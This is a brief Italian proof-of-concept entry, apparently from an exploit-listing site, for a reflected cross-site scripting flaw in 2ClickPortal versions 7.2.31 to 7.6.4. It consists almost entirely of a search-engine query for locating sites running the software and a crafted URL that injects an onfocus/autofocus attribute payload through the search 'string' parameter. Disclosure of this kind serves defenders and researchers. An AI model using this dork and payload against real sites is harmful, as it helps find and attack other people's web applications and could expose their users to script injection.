
Exploit proof-of-concept per la vulnerabilità XSS riflessa in 2ClickPortal versioni 7.2.31 fino a 7.6.4, con un payload di iniezione nel parametro di ricerca.
XSS riflesso in 2ClickPortal
Versione: dalla 7.2.31 alla 7.6.4.
intext:"Powered by 2ClickPortal"
https://[dominio]/szukaj/?search_lang=pl&search=all&string=" onfocus=alert(1) autofocus="